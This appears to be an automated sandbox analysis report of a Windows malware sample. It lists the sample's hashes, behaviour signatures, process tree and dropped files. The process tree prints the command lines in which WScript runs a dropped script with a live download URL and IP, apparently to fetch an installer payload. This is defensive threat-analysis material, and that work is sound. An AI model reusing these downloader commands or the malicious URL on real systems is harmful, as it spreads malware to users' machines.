Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06/06/2024, 05:47
Static task
static1
Behavioral task
behavioral1
Sample
9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe
-
Size
184KB
-
MD5
9a14d3ea3b1c04ce0581661a6b75e24c
-
SHA1
08b2deac27376195c9a241a08b8918b2941b9ad9
-
SHA256
fc79b49e3af566e67fa165c6ce098abf921bb32e979cb63824cdfc972baa5c2d
-
SHA512
7b3e6f434ef01c3c6348f75d5d709b37c266876f48668f3b9171f90e60c75016c83e7233c7f68495b3cccf9cade935a17a46cc46819f31f68760403fb0819f01
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3F:/7BSH8zUB+nGESaaRvoB7FJNndno
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 6 2924 WScript.exe 8 2924 WScript.exe 10 2924 WScript.exe 12 2380 WScript.exe 13 2380 WScript.exe 16 1800 WScript.exe 17 1800 WScript.exe 20 1568 WScript.exe 21 1568 WScript.exe 25 3020 WScript.exe 26 3020 WScript.exe 28 3020 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2952 1640 WerFault.exe 27 -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2924 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 28 PID 1640 wrote to memory of 2924 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 28 PID 1640 wrote to memory of 2924 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 28 PID 1640 wrote to memory of 2924 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 28 PID 1640 wrote to memory of 2380 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 30 PID 1640 wrote to memory of 2380 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 30 PID 1640 wrote to memory of 2380 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 30 PID 1640 wrote to memory of 2380 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 30 PID 1640 wrote to memory of 1800 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 32 PID 1640 wrote to memory of 1800 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 32 PID 1640 wrote to memory of 1800 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 32 PID 1640 wrote to memory of 1800 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 32 PID 1640 wrote to memory of 1568 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 34 PID 1640 wrote to memory of 1568 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 34 PID 1640 wrote to memory of 1568 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 34 PID 1640 wrote to memory of 1568 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 34 PID 1640 wrote to memory of 3020 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 36 PID 1640 wrote to memory of 3020 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 36 PID 1640 wrote to memory of 3020 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 36 PID 1640 wrote to memory of 3020 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 36 PID 1640 wrote to memory of 2952 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 40 PID 1640 wrote to memory of 2952 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 40 PID 1640 wrote to memory of 2952 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 40 PID 1640 wrote to memory of 2952 1640 9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9a14d3ea3b1c04ce0581661a6b75e24c_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe2⤵
- Blocklisted process makes network request
PID:2924
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe2⤵
- Blocklisted process makes network request
PID:2380
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe2⤵
- Blocklisted process makes network request
PID:1800
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe2⤵
- Blocklisted process makes network request
PID:1568
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2194.js" http://www.djapp.info/?domain=SqEMowyQks.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf2194.exe2⤵
- Blocklisted process makes network request
PID:3020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 4962⤵
- Program crash
PID:2952
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD527d886bc9f7deaa19ac45cd2e485a357
SHA103cd9680cc47a0cf8136b322ac17c8f91baa3d38
SHA256963680554db266eebb6fddf0e3a532a175e43b2f7bfcbd916447c6ed94b6b036
SHA512f97b7e50d5693666689474f9854ac6bdbc89233026b852c56484c33c7a9eb93a0bff32b5687cb395be14cf663a38e807635e604b9cad603ca115d970a8e4aaa6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD543762f008e07000323863ee51e051b49
SHA18615237f1ab58069fd6d7712f23310969a7e7092
SHA256464c6ce8fe548ae843b23a6349ac5cb2b3a340e44fffb9fb01319854fe18234c
SHA51201ea0f0b243011933dc26bde0c58885fd3274dbd8025a29d565d0a3d9821809651593d1d2bdb2ead8ce40c0557e1c957b166f474da2f41d2099d78d0840e026d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50e302cfc6869f4d030ec1d75c5ea4fd7
SHA1a29cabd1b4954fa093303e283b9a40e9f3c995ce
SHA2565f42138bfba3cfed537717022044c96bbe9a7b665c1caba2709178fb3b1e7343
SHA5128bf45173baab977a382957fff8517ba27447bf01eeb89d2d58b60559ad81bf0880b64f06a09f699f625f58c2f3042df737997bea600179a4843da2dafe736a60
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD50a1da893372e03c26e64815ff35a385a
SHA1a583ac67607fd146376c25fbe65f57d3ef7944fa
SHA256a254e570ea3514529594515571a9dde7f0939c0223cbb9b21db113a4bc9c9515
SHA512802fc0694a470710583e4295201df8c0f79c6bab0580019bc864fd12a17b64c947ae56dddc064c65dbb7e400f6e0dd1aa4a37a8fd8cbd858936fc54de62209a0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize40KB
MD575d54c7edc9c43ddf31caf07c905346a
SHA16e4d5d9f6b9f2f37bcf47786e8a2619936d046a2
SHA2565af74c12aaf545b45d2364f9cdba86c764bd4eec9d13f61335d9dbea5e9bec6e
SHA512d98c51681ddd718ec45b8a8bdafdb4e4559e963f86a5f0bcf51bcc30f65328e1eb7731c5c8498cb0c71ac90b9468f81084ae9e856f32e983d06904dcab0fbe94
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize6KB
MD5a53d4b41228a168f6028756045efe947
SHA14860a5b737f0cce9fd4e143f7549936ffa4e1eaa
SHA25662d3994659d3b00410df487fdd192f71fab3e8565d6fce8a1a5b9fca3e6bbfe1
SHA5126fdee7680f63d99e4ea9cc3c8d33b50fd165567f70ad88ee4e7a51d18bbd5725d8f834938ddc9b0843dcf0dbbf22296d29ea4f54061ebbe7a4587363336c2426
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize6KB
MD5dc3be7cf8fe345b0ab6113e3c056e687
SHA1df7f5761ce9d4b7d9498b6882c47eced35084748
SHA256546bfe8b128df06ba3b8882a39a08daa5ffd03706ff90b9831df5c62e17dbca1
SHA512944d9da9a2962049b845c6dec89dba0337aaadc166676e17c1cf6b0f788721901da387ae831ee7f3a7efc52806ecb5cd7bf6fb74dfd4d7aac3c175bd331bdafd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize6KB
MD5aca885a88ca38639e61e4d3fb99b1ec0
SHA13a33b92b966f51d5ca255f74303a47b5c232ed75
SHA256d34b764990476025b1a0392f29f3a7d9d57c0411172e66d34e35a6396a0fe225
SHA512d1a6f87b7333f48278f1aebe1019ebe66d1cb395a3f574cd272f4b9045166e21d1e641dbc35449603b656aa8f44b2f4e97fd425c4fb2e694c8275cd7ea3ecb98
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD582bfdaf8c5b5957e7c60b7e2fbf29c3b
SHA1a4e8f1a6ff36f2d3e9fddb4d22cb09eb926945b5
SHA2565d34e24017ad50a02ba801f968e6d96779fb24f9faf28c244517d985c58c67df
SHA512eec5841a4499cb5b37ac19a05438737b8f632bf99fe1614ab88dc4cfbb34f0d75e43d178006ca62fa759e27f4f9e26130d2f22727a7fc6ed06260dabb1c10e00